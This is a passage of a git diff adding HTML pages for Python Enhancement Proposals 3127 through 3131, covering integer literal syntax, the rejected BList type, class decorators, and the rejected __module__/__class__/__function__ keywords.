    • Under 2.6, long() is treated the same as int()
    • +
    +
  • +
  • Formatting of integers into strings, either via the % string +operator or the new PEP 3101 advanced string formatting method.
  • +
+

It is presumed that:

+
    +
  • All of these features should have an identical set +of supported radices, for consistency.
  • +
  • Python source code syntax and int(mystring, 0) should +continue to share identical behavior.
  • +
+
+
+

Removal of old octal syntax

+

This PEP proposes that the ability to specify an octal number by +using a leading zero will be removed from the language in Python 3.0 +(and the Python 3.0 preview mode of 2.6), and that a SyntaxError will +be raised whenever a leading “0” is immediately followed by another +digit.

+

During the present discussion, it was almost universally agreed that:

+
eval('010') == 8
+
+
+

should no longer be true, because that is confusing to new users. +It was also proposed that:

+
eval('0010') == 10
+
+
+

should become true, but that is much more contentious, because it is so +inconsistent with usage in other computer languages that mistakes are +likely to be made.

+

Almost all currently popular computer languages, including C/C++, +Java, Perl, and JavaScript, treat a sequence of digits with a +leading zero as an octal number. Proponents of treating these +numbers as decimal instead have a very valid point – as discussed +in Supported radices, below, the entire non-computer world uses +decimal numbers almost exclusively. There is ample anecdotal +evidence that many people are dismayed and confused if they +are confronted with non-decimal radices.

+

However, in most situations, most people do not write gratuitous +zeros in front of their decimal numbers. The primary exception is +when an attempt is being made to line up columns of numbers. But +since PEP 8 specifically discourages the use of spaces to try to +align Python code, one would suspect the same argument should apply +to the use of leading zeros for the same purpose.

+

Finally, although the email discussion often focused on whether anybody actually uses octal any more, and whether we should cater to those old-timers in any case, that is almost entirely beside the point.

+

Assume the rare complete newcomer to computing who does, either +occasionally or as a matter of habit, use leading zeros for decimal +numbers. Python could either:

+
    +
  a. silently do the wrong thing with their numbers, as it does now;
  b. immediately disabuse them of the notion that this is viable syntax (and yes, the SyntaxWarning should be more gentle than it currently is, but that is a subject for a different PEP); or
  c. let them continue to think that computers are happy with multi-digit decimal integers which start with “0”.
+

Some people passionately believe that (c) is the correct answer, +and they would be absolutely right if we could be sure that new +users will never blossom and grow and start writing AJAX applications.

+

So while a new Python user may (currently) be mystified at the +delayed discovery that their numbers don’t work properly, we can +fix it by explaining to them immediately that Python doesn’t like +leading zeros (hopefully with a reasonable message!), or we can +delegate this teaching experience to the JavaScript interpreter +in the browser, and let them try to debug their issue there.

+
+
+

Supported radices

+

This PEP proposes that the supported radices for the Python +language will be 2, 8, 10, and 16.

+

Once it is agreed that the old syntax for octal (radix 8) representation +of integers must be removed from the language, the next obvious +question is “Do we actually need a way to specify (and display) +numbers in octal?”

+

This question is quickly followed by “What radices does the language +need to support?” Because computers are so adept at doing what you +tell them to, a tempting answer in the discussion was “all of them.” +This answer has obviously been given before – the int() constructor +will accept an explicit radix with a value between 2 and 36, inclusive, +with the latter number bearing a suspicious arithmetic similarity to +the sum of the number of numeric digits and the number of same-case +letters in the ASCII alphabet.

+

But the best argument for inclusion will have a use-case to back +it up, so the idea of supporting all radices was quickly rejected, +and the only radices left with any real support were decimal, +hexadecimal, octal, and binary.

+

Just because a particular radix has a vocal supporter on the +mailing list does not mean that it really should be in the +language, so the rest of this section is a treatise on the +utility of these particular radices, vs. other possible choices.

+

Humans use other numeric bases constantly. If I tell you that +it is 12:30 PM, I have communicated quantitative information +arguably composed of three separate bases (12, 60, and 2), +only one of which is in the “agreed” list above. But the +communication of that information used two decimal digits +each for the base 12 and base 60 information, and, perversely, +two letters for information which could have fit in a single +decimal digit.

+

So, in general, humans communicate “normal” (non-computer) +numerical information either via names (AM, PM, January, …) +or via use of decimal notation. Obviously, names are +seldom used for large sets of items, so decimal is used for +everything else. There are studies which attempt to explain +why this is so, typically reaching the expected conclusion +that the Arabic numeral system is well-suited to human +cognition. [3]

+

There is even support in the history of the design of +computers to indicate that decimal notation is the correct +way for computers to communicate with humans. One of +the first modern computers, ENIAC [4] computed in decimal, +even though there were already existing computers which +operated in binary.

+

Decimal computer operation was important enough +that many computers, including the ubiquitous PC, have +instructions designed to operate on “binary coded decimal” +(BCD) [5], a representation which devotes 4 bits to each +decimal digit. These instructions date from a time when the +most strenuous calculations ever performed on many numbers +were the calculations actually required to perform textual +I/O with them. It is possible to display BCD without having +to perform a divide/remainder operation on every displayed +digit, and this was a huge computational win when most +hardware didn’t have fast divide capability. Another factor +contributing to the use of BCD is that, with BCD calculations, +rounding will happen exactly the same way that a human would +do it, so BCD is still sometimes used in fields like finance, +despite the computational and storage superiority of binary.

+

So, if it weren’t for the fact that computers themselves +normally use binary for efficient computation and data +storage, string representations of integers would probably +always be in decimal.

+

Unfortunately, computer hardware doesn’t think like humans, +so programmers and hardware engineers must often resort to +thinking like the computer, which means that it is important +for Python to have the ability to communicate binary data +in a form that is understandable to humans.

+

The requirement that the binary data notation must be cognitively +easy for humans to process means that it should contain an integral +number of binary digits (bits) per symbol, while otherwise +conforming quite closely to the standard tried-and-true decimal +notation (position indicates power, larger magnitude on the left, +not too many symbols in the alphabet, etc.).

+

The obvious “sweet spot” for this binary data notation is +thus octal, which packs the largest integral number of bits +possible into a single symbol chosen from the Arabic numeral +alphabet.

+

In fact, some computer architectures, such as the PDP8 and the +8080/Z80, were defined in terms of octal, in the sense of arranging +the bitfields of instructions in groups of three, and using +octal representations to describe the instruction set.

+

Even today, octal is important because of bit-packed structures +which consist of 3 bits per field, such as Unix file permission +masks.

+

But octal has a drawback when used for larger numbers. The +number of bits per symbol, while integral, is not itself +a power of two. This limitation (given that the word size +of most computers these days is a power of two) has resulted +in hexadecimal, which is more popular than octal despite the +fact that it requires a 60% larger alphabet than decimal, +because each symbol contains 4 bits.

+

Some numbers, such as Unix file permission masks, are easily +decoded by humans when represented in octal, but difficult to +decode in hexadecimal, while other numbers are much easier for +humans to handle in hexadecimal.

+

Unfortunately, there are also binary numbers used in computers +which are not very well communicated in either hexadecimal or +octal. Thankfully, fewer people have to deal with these on a +regular basis, but on the other hand, this means that several +people on the discussion list questioned the wisdom of adding +a straight binary representation to Python.

+

One example of where these numbers are very useful is in reading and writing hardware registers. Sometimes hardware designers will eschew human readability and opt for address space efficiency, by packing multiple bit fields into a single hardware register at unaligned bit locations, and it is tedious and error-prone for a human to reconstruct a 5 bit field which consists of the upper 3 bits of one hex digit, and the lower 2 bits of the next hex digit.

+

Even if the ability of Python to communicate binary information +to humans is only useful for a small technical subset of the +population, it is exactly that population subset which contains +most, if not all, members of the Python core team, so even straight +binary, the least useful of these notations, has several enthusiastic +supporters and few, if any, staunch opponents, among the Python community.

+
+
+

Syntax for supported radices

+

This proposal is to use a “0o” prefix with either uppercase +or lowercase “o” for octal, and a “0b” prefix with either +uppercase or lowercase “b” for binary.

+

There was strong support for not supporting uppercase, but +this is a separate subject for a different PEP, as ‘j’ for +complex numbers, ‘e’ for exponent, and ‘r’ for raw string +(to name a few) already support uppercase.

+

The syntax for delimiting the different radices received a lot of +attention in the discussion on Python-3000. There are several +(sometimes conflicting) requirements and “nice-to-haves” for +this syntax:

+
    +
  • It should be as compatible with other languages and +previous versions of Python as is reasonable, both +for the input syntax and for the output (e.g. string +% operator) syntax.
  • +
  • It should be as obvious to the casual observer as +possible.
  • +
  • It should be easy to visually distinguish integers +formatted in the different bases.
  • +
+

Proposed syntaxes included things like arbitrary radix prefixes, +such as 16r100 (256 in hexadecimal), and radix suffixes, similar +to the 100h assembler-style suffix. The debate on whether the +letter “O” could be used for octal was intense – an uppercase +“O” looks suspiciously similar to a zero in some fonts. Suggestions +were made to use a “c” (the second letter of “oCtal”), or even +to use a “t” for “ocTal” and an “n” for “biNary” to go along +with the “x” for “heXadecimal”.

+

For the string % operator, “o” was already being used to denote octal. Binary formatting is not being added to the % operator because PEP 3101 (Advanced String Formatting) already supports binary, and % formatting will be deprecated in the future.

+

At the end of the day, since uppercase “O” can look like a zero +and uppercase “B” can look like an 8, it was decided that these +prefixes should be lowercase only, but, like ‘r’ for raw string, +that can be a preference or style-guide issue.

+
+
+
+

Open Issues

+

It was suggested in the discussion that lowercase should be used +for all numeric and string special modifiers, such as ‘x’ for +hexadecimal, ‘r’ for raw strings, ‘e’ for exponentiation, and +‘j’ for complex numbers. This is an issue for a separate PEP.

+

This PEP takes no position on uppercase or lowercase for input, +just noting that, for consistency, if uppercase is not to be +removed from input parsing for other letters, it should be +added for octal and binary, and documenting the changes under +this assumption, as there is not yet a PEP about the case issue.

+

Output formatting may be a different story – there is already ample precedent for case sensitivity in the output format string, and there would need to be a consensus that there is a valid use-case for the “alternate form” of the string % operator to support uppercase ‘B’ or ‘O’ characters for binary or octal output. Currently, PEP 3101 does not even support this alternate capability, and the hex() function does not allow the programmer to specify the case of the ‘x’ character.

+

There are still some strong feelings that ‘0123’ should be +allowed as a literal decimal in Python 3.0. If this is the +right thing to do, this can easily be covered in an additional +PEP. This proposal only takes the first step of making ‘0123’ +not be a valid octal number, for reasons covered in the rationale.

+

Is there (or should there be) an option for the 2to3 translator +which only makes the 2.6 compatible changes? Should this be +run on 2.6 library code before the 2.6 release?

+

Should a bin() function which matches hex() and oct() be added?

+

Is hex() really that useful once we have advanced string formatting?

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3127.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-3128/index.html b/pep-3128/index.html
new file mode 100644
index 00000000000..187957fb7b6
--- /dev/null
+++ b/pep-3128/index.html
@@ -0,0 +1,543 @@
PEP 3128 – BList: A Faster List-like Type | peps.python.org
+
+


+ + +
+
+
+

PEP 3128 – BList: A Faster List-like Type

+
+
Author:
+
Daniel Stutzbach <daniel at stutzbachenterprises.com>
+
Discussions-To:
+
Python-3000 list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
30-Apr-2007
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+
30-Apr-2007
+
+
+
+
+
+

Rejection Notice

+

Rejected based on Raymond Hettinger’s sage advice [4]:

+
+
After looking at the source, I think this has almost zero chance for replacing list(). There is too much value in a simple C API, low space overhead for small lists, good performance in common use cases, and having performance that is easily understood. The BList implementation lacks these virtues and it trades off a little performance in common cases for much better performance in uncommon cases. As a Py3.0 PEP, I think it can be rejected.

Depending on its success as a third-party module, it still has a +chance for inclusion in the collections module. The essential +criteria for that is whether it is a superior choice for some +real-world use cases. I’ve scanned my own code and found no instances +where BList would have been preferable to a regular list. However, +that scan has a selection bias because it doesn’t reflect what I would +have written had BList been available. So, after a few months, I +intend to poll comp.lang.python for BList success stories. If they +exist, then I have no problem with inclusion in the collections +module. After all, its learning curve is near zero – the only cost +is the clutter factor stemming from indecision about the most +appropriate data structure for a given task.

+
+
+
+

Abstract

+

The common case for list operations is on small lists. The current +array-based list implementation excels at small lists due to the +strong locality of reference and infrequency of memory allocation +operations. However, an array takes O(n) time to insert and delete +elements, which can become problematic as the list gets large.

+

This PEP introduces a new data type, the BList, that has array-like and tree-like aspects. It enjoys the same good performance on small lists as the existing array-based implementation, but offers superior asymptotic performance for most operations. This PEP makes two mutually exclusive proposals for including the BList type in Python:

+
    +
  1. Add it to the collections module, or
  2. +
  3. Replace the existing list type
  4. +
+
+
+

Motivation

+

The BList grew out of the frustration of needing to rewrite intuitive +algorithms that worked fine for small inputs but took O(n**2) time for +large inputs due to the underlying O(n) behavior of array-based lists. +The deque type, introduced in Python 2.4, solved the most common +problem of needing a fast FIFO queue. However, the deque type doesn’t +help if we need to repeatedly insert or delete elements from the +middle of a long list.

+

A wide variety of data structures provide good asymptotic performance for insertions and deletions, but they either have O(n) performance for other operations (e.g., linked lists) or have inferior performance for small lists (e.g., binary trees and skip lists).

+

The BList type proposed in this PEP is based on the principles of +B+Trees, which have array-like and tree-like aspects. The BList +offers array-like performance on small lists, while offering O(log n) +asymptotic performance for all insert and delete operations. +Additionally, the BList implements copy-on-write under-the-hood, so +even operations like getslice take O(log n) time. The table below +compares the asymptotic performance of the current array-based list +implementation with the asymptotic performance of the BList.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
OperationArray-based listBList
CopyO(n)O(1)
AppendO(1)O(log n)
InsertO(n)O(log n)
Get ItemO(1)O(log n)
Set ItemO(1)O(log n)
Del ItemO(n)O(log n)
IterationO(n)O(n)
Get SliceO(k)O(log n)
Del SliceO(n)O(log n)
Set SliceO(n+k)O(log k + log n)
ExtendO(k)O(log k + log n)
SortO(n log n)O(n log n)
MultiplyO(nk)O(log k)
+

An extensive empirical comparison of Python’s array-based list and the BList is available at [2].

+
+
+

Use Case Trade-offs

+

The BList offers superior performance for many, but not all, +operations. Choosing the correct data type for a particular use case +depends on which operations are used. Choosing the correct data type +as a built-in depends on balancing the importance of different use +cases and the magnitude of the performance differences.

+

For the common use cases of small lists, the array-based list and the BList have similar performance characteristics.

+

For the slightly less common case of large lists, there are two common use cases where the existing array-based list outperforms the existing BList reference implementation. These are:

+
    +
  1. A large LIFO stack, where there are many .append() and .pop(-1) +operations. Each operation is O(1) for an array-based list, but +O(log n) for the BList.
  2. +
  3. A large list that does not change size. The getitem and setitem +calls are O(1) for an array-based list, but O(log n) for the BList.
  4. +
+

In performance tests on a 10,000 element list, BLists exhibited a 50% and 5% increase in execution time for these two use cases, respectively.

+

The performance for the LIFO use case could be improved to O(n) time for a sequence of n operations (amortized O(1) per operation), by caching a pointer to the right-most leaf within the root node. For lists that do not change size, the common case of sequential access could likewise be improved to O(n) time for n accesses via caching in the root node. However, the performance of these approaches has not been empirically tested.

+

Many operations exhibit a tremendous speed-up (O(n) to O(log n)) when +switching from the array-based list to BLists. In performance tests +on a 10,000 element list, operations such as getslice, setslice, and +FIFO-style insert and deletes on a BList take only 1% of the time +needed on array-based lists.

+

In light of the large performance speed-ups for many operations, the +small performance costs for some operations will be worthwhile for +many (but not all) applications.

+
+
+

Implementation

+

The BList is based on the B+Tree data structure. The BList is a wide, bushy tree where each node contains an array of up to 128 pointers to its children. If the node is a leaf, its children are the user-visible objects that the user has placed in the list. If a node is not a leaf, its children are other BList nodes that are not user-visible. If the list contains only a few elements, they will all be children of a single node that is both the root and a leaf. Since a node is little more than an array of pointers, small lists operate in effectively the same way as an array-based data type and share the same good performance characteristics.

+

The BList maintains a few invariants to ensure good (O(log n)) asymptotic performance regardless of the sequence of insert and delete operations. The principal invariants are as follows:

+
    +
  1. Each node has at most 128 children.
  2. +
  3. Each non-root node has at least 64 children.
  4. +
  5. The root node has at least 2 children, unless the list contains +fewer than 2 elements.
  6. +
  7. The tree is of uniform depth.
  8. +
+

If an insert would cause a node to exceed 128 children, the node +spawns a sibling and transfers half of its children to the sibling. +The sibling is inserted into the node’s parent. If the node is the +root node (and thus has no parent), a new parent is created and the +depth of the tree increases by one.

+
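A toy sketch of this insert-and-split rule (illustrative only, nothing like the real C implementation; LIMIT and HALF mirror the 128/64 bounds above):

LIMIT, HALF = 128, 64

class Node:
    def __init__(self, children=None, leaf=True):
        self.children = children if children is not None else []
        self.leaf = leaf

    def insert(self, index, item):
        """Insert item; return a new right sibling if this node overflowed."""
        self.children.insert(index, item)
        if len(self.children) <= LIMIT:
            return None
        # Spawn a sibling and transfer half of the children to it.  The
        # caller (the parent node) must insert the sibling next to this
        # node, possibly splitting itself in turn, up to the root.
        sibling = Node(self.children[HALF:], self.leaf)
        del self.children[HALF:]
        return sibling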

If a deletion would cause a node to have fewer than 64 children, the +node moves elements from one of its siblings if possible. If both of +its siblings also only have 64 children, then two of the nodes merge +and the empty one is removed from its parent. If the root node is +reduced to only one child, its single child becomes the new root +(i.e., the depth of the tree is reduced by one).

+

In addition to tree-like asymptotic performance and array-like performance on small lists, BLists support transparent copy-on-write. If a non-root node needs to be copied (as part of a getslice, copy, setslice, etc.), the node is shared between multiple parents instead of being copied. If it needs to be modified later, it will be copied at that time. This is completely behind-the-scenes; from the user’s point of view, the BList works just like a regular Python list.

+
+
+

Memory Usage

+

In the worst case, the leaf nodes of a BList have only 64 children +each, rather than a full 128, meaning that memory usage is around +twice that of a best-case array implementation. Non-leaf nodes use up +a negligible amount of additional memory, since there are at least 63 +times as many leaf nodes as non-leaf nodes.

+

The existing array-based list implementation must grow and shrink as items are added and removed. To be efficient, it grows and shrinks only when the list has grown or shrunk exponentially. In the worst case, it, too, uses twice as much memory as the best case.

+

In summary, the BList’s memory footprint is not significantly +different from the existing array-based implementation.

+
+
+

Backwards Compatibility

+

If the BList is added to the collections module, backwards +compatibility is not an issue. This section focuses on the option of +replacing the existing array-based list with the BList. For users of +the Python interpreter, a BList has an identical interface to the +current list-implementation. For virtually all operations, the +behavior is identical, aside from execution speed.

+

For the C API, BList has a different interface than the existing list-implementation. Due to its more complex structure, the BList does not lend itself well to poking and prodding by external sources. Thankfully, the existing list-implementation defines an API of functions and macros for accessing data from list objects. Google Code Search suggests that the majority of third-party modules use the well-defined API rather than relying on the list’s structure directly. The table below summarizes the search queries and results:

+ + + + + + + + + + + + + + + + + + + + + + + +
Search StringNumber of Results
PyList_GetItem2,000
PySequence_GetItem800
PySequence_Fast_GET_ITEM100
PyList_GET_ITEM400
[^a-zA-Z_]ob_item100
+

This can be achieved in one of two ways:

+
    +
  1. Redefine the various accessor functions and macros in listobject.h +to access a BList instead. The interface would be unchanged. The +functions can easily be redefined. The macros need a bit more care +and would have to resort to function calls for large lists.

    The macros would need to evaluate their arguments more than once, +which could be a problem if the arguments have side effects. A +Google Code Search for “PyList_GET_ITEM([^)]+(” found only a +handful of cases where this occurs, so the impact appears to be +low.

    +

    The few extension modules that use list’s undocumented structure +directly, instead of using the API, would break. The core code +itself uses the accessor macros fairly consistently and should be +easy to port.

    +
  2. +
  3. Deprecate the existing list type, but continue to include it. +Extension modules wishing to use the new BList type must do so +explicitly. The BList C interface can be changed to match the +existing PyList interface so that a simple search-replace will be +sufficient for 99% of module writers.

    Existing modules would continue to compile and work without change, +but they would need to make a deliberate (but small) effort to +migrate to the BList.

    +

    The downside of this approach is that mixing modules that use BLists and array-based lists might lead to slowdowns if conversions are frequently necessary.

    +
  4. +
+
+
+

Reference Implementation

+

A reference implementation of the BList is available for CPython at [1].

+

The source package also includes a pure Python implementation, +originally developed as a prototype for the CPython version. +Naturally, the pure Python version is rather slow and the asymptotic +improvements don’t win out until the list is quite large.

+

When compiled with Py_DEBUG, the C implementation checks the +BList invariants when entering and exiting most functions.

+

An extensive set of test cases is also included in the source package. +The test cases include the existing Python sequence and list test +cases as a subset. When the interpreter is built with Py_DEBUG, the +test cases also check for reference leaks.

+
+

Porting to Other Python Variants

+

If the BList is added to the collections module, other Python variants +can support it in one of three ways:

+
    +
  1. Make blist an alias for list. The asymptotic performance won’t be +as good, but it’ll work.
  2. +
  3. Use the pure Python reference implementation. The performance for +small lists won’t be as good, but it’ll work.
  4. +
  5. Port the reference implementation.
  6. +
+
+
+
+

Discussion

+

This proposal has been discussed briefly on the Python-3000 mailing +list [3]. Although a number of people favored the proposal, there +were also some objections. Below summarizes the pros and cons as +observed by posters to the thread.

+

General comments:

+
    +
  • Pro: Will outperform the array-based list in most cases
  • +
  • Pro: “I’ve implemented variants of this … a few different times”
  • +
  • Con: Desirability and performance in actual applications is unproven
  • +
+

Comments on adding BList to the collections module:

+
    +
  • Pro: Matching the list-API reduces the learning curve to near-zero
  • +
  • Pro: Useful for intermediate-level users; won’t get in the way of beginners
  • +
  • Con: Proliferation of data types makes the choices for developers harder.
  • +
+

Comments on replacing the array-based list with the BList:

+
    +
  • Con: Impact on extension modules (addressed in Backwards +Compatibility)
  • +
  • Con: The use cases where BLists are slower are important +(see Use Case Trade-Offs for how these might be addressed).
  • +
  • Con: The array-based list code is simple and easy to maintain
  • +
+

To assess the desirability and performance in actual applications, +Raymond Hettinger suggested releasing the BList as an extension module +(now available at [1]). If it proves useful, he felt it would be a +strong candidate for inclusion in 2.6 as part of the collections +module. If widely popular, then it could be considered for replacing +the array-based list, but not otherwise.

+

Guido van Rossum commented that he opposed the proliferation of data +types, but favored replacing the array-based list if backwards +compatibility could be addressed and the BList’s performance was +uniformly better.

+
+
+

On-going Tasks

+
    +
  • Reduce the memory footprint of small lists
  • +
  • Implement TimSort for BLists, so that best-case sorting is O(n) instead of O(n log n).
  • +
  • Implement __reversed__
  • +
  • Cache a pointer in the root to the rightmost leaf, to make a sequence of n LIFO operations O(n) time (amortized O(1) each).
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3128.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-3129/index.html b/pep-3129/index.html
new file mode 100644
index 00000000000..7a9b31f47a1
--- /dev/null
+++ b/pep-3129/index.html
@@ -0,0 +1,232 @@
PEP 3129 – Class Decorators | peps.python.org
+
+


+ + +
+
+
+

PEP 3129 – Class Decorators

+
+
Author:
+
Collin Winter <collinwinter at google.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-May-2007
+
Python-Version:
+
3.0
+
Post-History:
+
07-May-2007
+
+
+
+
+
+

Abstract

+

This PEP proposes class decorators, an extension to the function +and method decorators introduced in PEP 318.

+
+
+

Rationale

+

When function decorators were originally debated for inclusion in +Python 2.4, class decorators were seen as +obscure and unnecessary +thanks to metaclasses. After several years’ experience +with the Python 2.4.x series of releases and an increasing +familiarity with function decorators and their uses, the BDFL and +the community re-evaluated class decorators and recommended their +inclusion in Python 3.0 [1].

+

The motivating use-case was to make certain constructs more easily +expressed and less reliant on implementation details of the CPython +interpreter. While it is possible to express class decorator-like +functionality using metaclasses, the results are generally +unpleasant and the implementation highly fragile [2]. In +addition, metaclasses are inherited, whereas class decorators are not, +making metaclasses unsuitable for some, single class-specific uses of +class decorators. The fact that large-scale Python projects like Zope +were going through these wild contortions to achieve something like +class decorators won over the BDFL.

+
+
+

Semantics

+

The semantics and design goals of class decorators are the same as +for function decorators (PEP 318); the only +difference is that you’re decorating a class instead of a function. +The following two snippets are semantically identical:

+
class A:
+  pass
+A = foo(bar(A))
+
+
+@foo
+@bar
+class A:
+  pass
+
+
+
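
A concrete, runnable sketch of this equivalence (register is a hypothetical decorator chosen for illustration, not part of the proposal):

+
registry = {}
+
+def register(cls):
+    # A class decorator is just a callable applied to the class object.
+    registry[cls.__name__] = cls
+    return cls
+
+@register
+class A:
+    pass
+
+# ...which is the same as:
+class B:
+    pass
+B = register(B)
+
+assert registry == {'A': A, 'B': B}
+
+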

For a detailed examination of decorators, please refer to PEP 318.

+
+
+

Implementation

+

Adapting Python’s grammar to support class decorators requires +modifying two rules and adding a new rule:

+
funcdef: [decorators] 'def' NAME parameters ['->' test] ':' suite
+
+compound_stmt: if_stmt | while_stmt | for_stmt | try_stmt |
+               with_stmt | funcdef | classdef
+
+
+

need to be changed to

+
decorated: decorators (classdef | funcdef)
+
+funcdef: 'def' NAME parameters ['->' test] ':' suite
+
+compound_stmt: if_stmt | while_stmt | for_stmt | try_stmt |
+               with_stmt | funcdef | classdef | decorated
+
+
+

Adding decorated is necessary to avoid an ambiguity in the +grammar.

+

The Python AST and bytecode must be modified accordingly.

+

A reference implementation [3] has been provided by +Jack Diederich.

+
+
+

Acceptance

+

There was virtually no discussion following the posting of this PEP, +meaning that everyone agreed it should be accepted.

+

The patch was committed to Subversion as revision 55430.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3129.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3130/index.html b/pep-3130/index.html new file mode 100644 index 00000000000..7eb0c0506b4 --- /dev/null +++ b/pep-3130/index.html @@ -0,0 +1,331 @@ + + + + + + + + PEP 3130 – Access to Current Module/Class/Function | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3130 – Access to Current Module/Class/Function

+
+
Author:
+
Jim J. Jewett <jimjjewett at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
22-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+
22-Apr-2007
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP is rejected. It is not clear how it should be +implemented or what the precise semantics should be in edge cases, +and there aren’t enough important use cases given. Response has +been lukewarm at best.

+
+
+

Abstract

+

It is common to need a reference to the current module, class, +or function, but there is currently no entirely correct way to +do this. This PEP proposes adding the keywords __module__, +__class__, and __function__.

+
+
+

Rationale for __module__

+

Many modules export various functions, classes, and other objects, +but will perform additional activities (such as running unit +tests) when run as a script. The current idiom is to test whether +the module’s name has been set to a magic value.

+
if __name__ == "__main__": ...
+
+
+

More complicated introspection requires a module to (attempt to) +import itself. If importing the expected name actually produces +a different module, there is no good workaround.

+
# __import__ lets you use a variable, but... it gets more
+# complicated if the module is in a package.
+__import__(__name__)
+
+# So just go to sys modules... and hope that the module wasn't
+# hidden/removed (perhaps for security), that __name__ wasn't
+# changed, and definitely hope that no other module with the
+# same name is now available.
+class X(object):
+    pass
+
+import sys
+mod = sys.modules[__name__]
+mod = sys.modules[X.__module__]  # X.__class__.__module__ would name the metaclass's module
+
+
+

Proposal: Add a __module__ keyword which refers to the module +currently being defined (executed). (But see open issues.)

+
# XXX sys.main is still changing as draft progresses.  May
+# really need sys.modules[sys.main]
+if __module__ is sys.main:    # assumes PEP 3122 (Cannon)
+    ...
+
+
+
+
+

Rationale for __class__

+

Methods are passed the current instance; from this they can +determine self.__class__ (or cls, for class methods). +Unfortunately, this reference is to the object’s actual class, +which may be a subclass of the defining class. The current +workaround is to repeat the name of the class, and assume that the +name will not be rebound.

+
class C(B):
+
+    def meth(self):
+        super(C, self).meth() # Hope C is never rebound.
+
+class D(C):
+
+    def meth(self):
+        # ?!? issubclass(D,C), so it "works":
+        super(C, self).meth()
+
+
+

Proposal: Add a __class__ keyword which refers to the class +currently being defined (executed). (But see open issues.)

+
class C(B):
+    def meth(self):
+        super(__class__, self).meth()
+
+
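
Although this PEP was rejected, Python 3 did later gain a __class__ cell inside methods through the “new super” work (PEP 3135), so this half of the proposal can be checked directly in today's Python 3:

+
class B:
+    def meth(self):
+        return "B"
+
+class C(B):
+    def meth(self):
+        # Filled in by the compiler: always the defining class C,
+        # even when called on a subclass instance.
+        assert __class__ is C
+        return super().meth()
+
+class D(C):
+    pass
+
+assert D().meth() == "B"
+
+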
+

Note that super calls may be further simplified by the “New Super” +PEP (Spealman). The __class__ (or __this_class__) attribute came +up in attempts to simplify the explanation and/or implementation +of that PEP, but was separated out as an independent decision.

+

Note that __class__ (or __this_class__) is not quite the same as +the __thisclass__ property on bound super objects. The existing +super.__thisclass__ property refers to the class from which the +Method Resolution Order search begins. In the above class D, it +would refer to (the current reference of name) C.

+
+
+

Rationale for __function__

+

Functions (including methods) often want access to themselves, +usually for a private storage location or true recursion. While +there are several workarounds, all have their drawbacks.

+
def counter(_total=[0]):
+    # _total shouldn't really appear in the
+    # signature at all; the list wrapping and
+    # [0] unwrapping obscure the code
+    _total[0] += 1
+    return _total[0]
+
+@annotate(total=0)
+def counter():
+    # Assume name counter is never rebound:
+    counter.total += 1
+    return counter.total
+
+# class exists only to provide storage:
+class _wrap(object):
+
+    __total = 0
+
+    def f(self):
+        self.__total += 1
+        return self.__total
+
+# set module attribute to a bound method:
+accum = _wrap().f
+
+# This function calls "factorial", which should be itself --
+# but the same programming styles that use heavy recursion
+# often have a greater willingness to rebind function names.
+def factorial(n):
+    return (n * factorial(n-1) if n else 1)
+
+
+

Proposal: Add a __function__ keyword which refers to the function +(or method) currently being defined (executed). (But see open +issues.)

+
@annotate(total=0)
+def counter():
+    # Always refers to this function obj:
+    __function__.total += 1
+    return __function__.total
+
+def factorial(n):
+    return (n * __function__(n-1) if n else 1)
+
+
+
+
+

Backwards Compatibility

+

While a user could be using these names already, double-underscore +names (__anything__) are explicitly reserved to the interpreter. +It is therefore acceptable to introduce special meaning to these +names within a single feature release.

+
+
+

Implementation

+

Ideally, these names would be keywords treated specially by the +bytecode compiler.

+

Guido has suggested [1] using a cell variable filled in by the +metaclass.

+

Michele Simionato has provided a prototype using bytecode hacks [2]. +This does not require any new bytecode operators; it just +modifies which specific sequence of existing operators gets +run.

+
+
+

Open Issues

+
    +
  • Are __module__, __class__, and __function__ the right names? In +particular, should the names include the word “this”, either as +__this_module__, __this_class__, and __this_function__ (format +discussed on the python-3000 and python-ideas lists) or as +__thismodule__, __thisclass__, and __thisfunction__ (inspired +by, but conflicting with, current usage of super.__thisclass__).
  • +
  • Are all three keywords needed, or should this enhancement be +limited to a subset of the objects? Should methods be treated +separately from other functions?
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3130.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3131/index.html b/pep-3131/index.html new file mode 100644 index 00000000000..83ccafa0985 --- /dev/null +++ b/pep-3131/index.html @@ -0,0 +1,369 @@ + + + + + + + + PEP 3131 – Supporting Non-ASCII Identifiers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3131 – Supporting Non-ASCII Identifiers

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-May-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP suggests supporting non-ASCII letters (such as accented characters, +Cyrillic, Greek, Kanji, etc.) in Python identifiers.

+
+
+

Rationale

+

